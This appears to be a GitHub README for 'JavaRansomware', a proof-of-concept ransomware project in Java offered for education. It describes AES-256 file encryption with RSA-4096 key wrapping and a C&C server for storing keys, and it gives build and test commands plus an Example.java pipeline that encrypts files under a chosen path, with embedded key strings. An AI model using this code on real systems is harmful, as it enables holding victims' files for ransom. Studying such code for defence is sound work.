Security
Special thanks my followers for supporting me:
Warning
This project is intended solely for educational and research purposes.
Do not use it on any system without explicit permission. Using code like this to compromise systems or data without authorization is illegal and unethical.
JavaRansomware is a proof-of-concept cryptographic ransomware application written in pure Java. It demonstrates how a malicious actor might encrypt files on a target machine, hold them for ransom, and only decrypt them upon certain conditions. Ransomware is malware for data kidnapping, an exploit in which the attacker encrypts the victim's files and stops them from access them.
As a teaching tool, this repository illustrates common ransomware tactics:
Again, this software is provided for educational and research insights into how ransomware threats operate, so security professionals, researchers, and students can better understand and defend against them.
There are different types of ransomware. However, all of them will prevent you from using your PC normally, and they will all ask you to do something before you can use your PC. They can target any PC users, whether it’s a home computer, endpoints in an enterprise network, or servers used by a government agency or healthcare provider.
Ransomware can:
Prevent you from accessing Windows.
Encrypt files so you can't use them.
Stop certain apps from running (like your web browser).
Ransomware will demand that you pay money (a “ransom”) to get access to your PC or files. We have also seen them make you complete surveys. There is no guarantee that paying the fine or doing what the ransomware tells you will give access to your PC or files again.
Symmetric Encryption (AES-256)
Asymmetric Key Protection (RSA-4096)
Configurable File Paths
Simple Command-Line Interface
Educational-Focused
File Discovery
AES Key Generation
RSA Public Key Encryption
AES File Encryption
(Optional) Logging/DB
RSA Private Key
AES File Decryption
This project aims to build an almost functional crypto-ransomware for educational purposes, written in in pure java. Basically, it will encrypt your files in background using AES-256, a strong encryption algorithm, using RSA-4096 Public Key to secure the AES Symetric key and store it in an embeeded database.
Assume that there is a C&C Server who for store the Id and the respective encryption key and possibly act as a Command and Control server in the near future.
For Education Purposes I will not Provide the Full Server source code.,as i decribed in the previous paragraph. Let's imagine a simple testing example which client by deafult has the Asymmetrtic encryption keys.
The easiest way to run this Project is to simply run the below commands
$ mvn clean install
Run the following test and encrypt all files in the current given path of the Examples test file and wait until the execution will be finished.
mvn -Dtest=MyTest ExampleTest test
DON'T RUN JavaRansomware.jar IN YOUR PERSONAL MACHINE, EXECUTE ONLY IN A TEST ENVIRONMENT(VMWARE)!
if you want to use the project programmatically just put the below code in your project and simply run it. Don't forget to give input arguments path before executing it.
JDK 21 is required to build and run this project.
package com.security;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.security.GeneralSecurityException;
public class Example {
private static final String PubicKey = "MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJCw1HHQooCFGsGhtxNrsdS6dDq5jtfHqqLInCj7qFlDaD/Sll5+BAUjV0GU/c+6PVyMKzmLrHh49eeGQy1ETN8CAwEAAQ==";
private static final String PrivateKey = "MIIBVAIBADANBgkqhkiG9w0BAQEFAASCAT4wggE6AgEAAkEAkLDUcdCigIUawaG3E2ux1Lp0OrmO18eqosicKPuoWUNoP9KWXn4EBSNXQZT9z7o9XIwrOYuseHj154ZDLURM3wIDAQABAkA9AnLx8tkye+2GTBwYEkcPvfcYc/mpPsXSkehW15Zq3IALx3Kr5GgKGOaB2FK6PU0QzEPQbNJXdA5ZPjwTDcQBAiEA1/zINRVlrLpw2HPfqsYQ8ZSDuG2rVUUKKmKgJQXeQ98CIQCrfsw2+VKOaFoJm5BpVxIT5nsE8CXn4fr/WSFuklMXAQIgTKWnAreCKmbLTvTn5bl+H8zdZaB9kbf7YIk5XYoUky8CIQCL2ccnPYK5ZxelphrKDJtNZzMC/+OpiXtqKIE+7kycAQIgRK/DUhWUgSQV5u7VoCHDyLPCntjFMGBsg7Wi1uq+EDM=";
public static void main(String[] args) throws RansomwareException, GeneralSecurityException {
// Set Whatever path you want to test
Path testPath = Paths.get("C:\\Users\\User\\Documents\\GitHub\\JavaRansomware\\src\\resources");
//Path testPath = Paths.get(Objects.requireNonNull(ExampleTest.class.getResource("/test.txt")).toURI());
PipelineData pipelineData = new PipelineData();
pipelineData.setPrivateKey(PrivateKey);
pipelineData.setPublicKey(PubicKey);
// Alternative Gen RSA. Make sure you save the keypair to a file if not loaded
// RSAGenKeyReader.StringKeyPair keyPair=RSAGenKeyReader.generateKeyPair();
// pipelineData.setPrivateKey(keyPair.privateKey());
// pipelineData.setPublicKey(keyPair.publicKey());
pipelineData.setRootPath(testPath.toAbsolutePath().toString());
Pipeline<PipelineData, PipelineData> encrypt_filters = new Pipeline<PipelineData, PipelineData>(new DatabaseRetrieveHandler())
.addHandler(new GenSymmetricKeyHandler())
.addHandler(new RansomwareEncryptHandler())
.addHandler(new EncryptKeyHandler())
.addHandler(new DatabaseStoreHandler());
var encrypt_output = encrypt_filters.execute(pipelineData);
System.out.println("Pipeline encrypt_output: " + encrypt_output);
Pipeline<PipelineData, PipelineData> decrypt_filters = new Pipeline<PipelineData, PipelineData>(new DatabaseRetrieveHandler())
.addHandler(new DecryptKeyHandler())
.addHandler(new RansomwareDecryptHandler())
.addHandler(new DecryptKeyHandler());
var decrypt_output = decrypt_filters.execute(pipelineData);
System.out.println("Pipeline output: " + decrypt_output);
}
}
While this may be helpful for some, there are significant risks. JavaRansomware may be used only for Educational Purposes. Do not use it as a ransomware! You could go to jail if if you will use it for malicious purposes.<
For support, email panagiotisdrakatos@gmail.com or join me Discord:panos5427. Meaning, if you liked using this app or it has helped you in any way, I'd like you send me an email about anything you'd want to say about this software. I'd really appreciate it!
git checkout -b my-new-feature
git commit -am 'Add some feature
git push origin my-new-feature
This project is distributed under the MIT license version 2.0 (see the LICENSE file in the project root).
By submitting a pull request to this project, you agree to license your contribution under the MIT license version 2.0 to this project.